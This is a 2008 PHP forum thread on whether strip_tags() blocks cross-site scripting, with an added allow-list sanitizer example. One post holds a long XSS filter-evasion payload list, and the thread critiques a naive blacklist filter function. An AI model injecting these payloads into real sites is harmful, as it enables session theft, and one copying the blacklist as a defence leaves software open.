the182guy
Nov 5th, 2008, 11:13 AM
Another one here. (http://uk.php.net/manual/en/function.strip-tags.php#86463)
Y.P.Y
Nov 5th, 2008, 11:31 AM
No, it is not secure! Don't use it. http://uk.php.net/manual/en/function.strip-tags.php#86463
the182guy
Nov 5th, 2008, 11:47 AM
Why is it not secure?
According to this (http://lists.horde.org/archives/dev/Week-of-Mon-20040712/014787.html) the strip_tags vulnerability was fixed in CVS in 2004.
kfcSmitty
Nov 5th, 2008, 12:30 PM
The only vulnerability I could find is listed here:
http://www.net-security.org/vuln.php?id=3570
And it has been fixed since then. What vulnerability are you talking about, Y.P.Y?
dclamp
Nov 5th, 2008, 06:07 PM
No, is not secure! Dont use. http://uk.php.net/manual/en/function.strip-tags.php#86463
This function works fine. The person who posted that note obviously did something wrong.
It works perfectly fine for me:
http://subsoft.net/personal/strip_tags.phps [Script File]
http://subsoft.net/personal/strip_tags.php
<?php
// a single very long <param> tag
$html = <<<EOF
<param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm
...[snip]...
vie%20of%20All-Time"/>
EOF;
// the php.net note claims this prints an empty string; on this setup it prints the whole tag (output below)
echo strip_tags($html, '<param>');
?>
outputs:
<param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm
...[snip]...
vie%20of%20All-Time"/>
I_Love_My_Vans
Nov 6th, 2008, 03:44 AM
Another attempt by Y.P.Y to take over the world with unindented PHP code.
I agree with everyone else, it would appear any vulnerabilities were fixed long ago...
...however, keep going, and keep learning.
Y.P.Y
Nov 6th, 2008, 05:13 AM
Check with this value:
<script>alert(document.cookie)</script>
<IMG SRC="javascript:alert("XSS");">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("XSS")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert("XSS");">
<IMG SRC="jav	ascript:alert("XSS");">
<IMG SRC="jav
ascript:alert("XSS");">
<IMG SRC="jav
ascript:alert("XSS");">
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
"
X
S
S
"
)
"
>
<IMG SRC=" javascript:alert("XSS");">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG SRC="javascript:alert("XSS")"
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert("XSS");">
<BODY BACKGROUND="javascript:alert("XSS")">
<BODY ONLOAD=alert("XSS")>
<IMG DYNSRC="javascript:alert("XSS")">
<IMG LOWSRC="javascript:alert("XSS")">
<BGSOUND SRC="javascript:alert("XSS");">
<BR SIZE="&{alert("XSS")}">
<LINK REL="stylesheet" HREF="javascript:alert("XSS");">
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>li {list-style-image: url("javascript:alert("XSS")");}</STYLE><UL><LI>XSS
<IMG SRC="vbscript:msgbox("XSS")">
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
?script?alert(?XSS?)?/script?
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert("XSS");">
<IFRAME SRC="javascript:alert("XSS");"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert("XSS");"></FRAMESET>
<TABLE BACKGROUND="javascript:alert("XSS")">
<TABLE><TD BACKGROUND="javascript:alert("XSS")">
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
<DIV STYLE="background-image:\0075\0072\006C\0028"\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053 \0053\0027\0029"\0029">
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
<DIV STYLE="width: expression(alert("XSS"));">
<STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert("XSS"))">
<XSS STYLE="xss:expression(alert("XSS"))">
exp/*<A STYLE="no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))">
<STYLE>.XSS{background-image:url("javascript:alert("XSS")");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert("XSS")")}</STYLE>
<SCRIPT>alert("XSS");</SCRIPT>
<BASE HREF="javascript:alert("XSS");//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert("XSS")></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
a="get";
b="URL(\"";
c="javascript:";
d="alert("XSS");\")";
eval(a+b+c+d);
<HTML xmlns:xss>
<xss:xss>XSS</xss:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert("XSS");">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert("XSS")"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
<? echo("<SCR)";
echo("IPT>alert("XSS")</SCRIPT>"); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert("XSS")</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert("XSS");+ADw-/SCRIPT+AD4-
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
<
%3C
\x3c
\x3C
\u003c
\u003C
I_Love_My_Vans
Nov 6th, 2008, 06:43 AM
...I think you broke the internet, you might need to amend your code tags...
kfcSmitty
Nov 6th, 2008, 08:29 AM
Yours trims out too much. It also doesn't have the ability to omit tags in the replace.
For example, if I was echoing something without the tags, I may want my code properly aligned in the background.
echo _Strip_Tag("<s\0\0cript>\n\ntesting");
echo strip_tags("<script>\n\ntesting<s\0cript>");
Your function will strip out the newline character, whereas the real strip_tags allows it.
dclamp
Nov 6th, 2008, 01:51 PM
@ YPY: The strip tags function is meant to strip tags, not to remove harmful javascript...
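As an added example (not code from the thread, and not Y.P.Y's function) of the distinction dclamp draws: strip_tags() only removes tags and leaves every attribute of an allowed tag in place, whereas output encoding, or rebuilding parsed markup from an allow-list of tags and attributes, is what actually stops script from running. The function names and the sample string are mine.

```php
<?php
// Added example, not code from the thread; input strings are constructed samples.
// Output encoding is the defence when untrusted input is text to display, not
// markup to render. ENT_QUOTES also covers single-quoted attribute contexts.
function encodeForHtml(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// If some markup must be kept, parse it and rebuild only what is allowed: the
// listed tags, and for <a> only an href that starts with http:// or https://.
function sanitizeAllowList(string $html): string
{
    $allowed = ['b' => [], 'i' => [], 'a' => ['href']];
    libxml_use_internal_errors(true); // malformed input is expected, not fatal
    $doc = new DOMDocument();
    $doc->loadHTML('<div>' . $html . '</div>', LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    return renderNode($doc->getElementsByTagName('div')->item(0), $allowed);
}

function renderNode(DOMNode $node, array $allowed): string
{
    $out = '';
    foreach ($node->childNodes as $child) { // comments and PIs fall through and are dropped
        if ($child instanceof DOMText) {
            $out .= encodeForHtml($child->nodeValue);
        } elseif ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if ($tag === 'script' || $tag === 'style') { continue; } // dropped with contents
            $inner = renderNode($child, $allowed);
            if (!isset($allowed[$tag])) { $out .= $inner; continue; } // unlisted: text only
            $attrs = '';
            foreach ($allowed[$tag] as $name) {
                $value = trim($child->getAttribute($name));
                if ($value === '' || ($name === 'href' && !preg_match('#^https?://#i', $value))) {
                    continue; // rejects javascript:, data:, vbscript: and similar schemes
                }
                $attrs .= ' ' . $name . '="' . encodeForHtml($value) . '"';
            }
            $out .= "<$tag$attrs>$inner</$tag>";
        }
    }
    return $out;
}

$sample = '<a href="javascript:alert(1)" onclick="x()">link</a><b>bold</b><script>x()</script>';
// strip_tags() keeps every attribute of an allowed tag: the javascript: href and onclick survive
echo strip_tags($sample, '<a><b>'), "\n";
echo encodeForHtml($sample), "\n";     // nothing renders as markup
echo sanitizeAllowList($sample), "\n"; // <a>link</a><b>bold</b>
```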
Y.P.Y
Nov 6th, 2008, 03:40 PM
Tag is all. JavaScript, HTML, VBScript...
visualAd
Nov 6th, 2008, 04:30 PM
Please, please invest some of your hard-earned money in a "Beginning PHP 5" book.
function _Strip_Tag($Str_Input)
{
@settype($Str_Input, 'string'); ///// no need to do this, and no need to prefix it with the error suppression operator
$Str_Input= @strip_tags($Str_Input); //// again, why are you using the error suppression operator?
// where did you get these from? the hexadecimal numbers are not even valid
// HTML entities. The script tags would have been removed by strip_tags, as would the comments
$_Ary_TagsList= array('jav
ascript:', 'jav
ascript:', 'jav	ascript:', 'JaVaScRiPt:', 'JAVASCRIPT:', '<script>', '<SCRIPT>', '<script >', '<noscript>', '</script>', '<!-', '<', '>', '%3C', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '<', '\x3c', '\x3C', '\u003c', '\u003C', chr(60), chr(62));
$Str_Input= @str_replace($_Ary_TagsList, '', $Str_Input);
// I've never seen anything so pointless in my life - what does this do,
// except remove two new lines?
$Str_Input= @str_replace('
', '', $Str_Input);
// it was a string in the first place, why try and cast it back to a string?
return((string)$Str_Input);
}